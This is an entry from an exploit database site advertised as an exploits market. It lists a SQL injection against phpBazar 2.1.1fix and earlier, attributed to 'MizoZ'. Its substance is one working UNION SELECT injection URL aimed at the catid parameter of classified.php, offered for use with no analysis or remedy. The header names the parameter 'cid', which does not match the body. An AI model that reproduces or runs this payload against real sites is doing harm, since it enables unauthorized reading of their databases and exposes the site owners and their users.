[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpBazar <= 2.1.1fix (cid) SQL Injection

Author
MizoZ
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10037
Category
web applications
Date add
28-11-2009
Platform
unsorted
========================================
phpBazar <= 2.1.1fix (cid) SQL Injection
========================================

The vulnerability is in the $_GET['catid'] , exploit :
http://server/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--


#  0day.today [2024-12-24]  #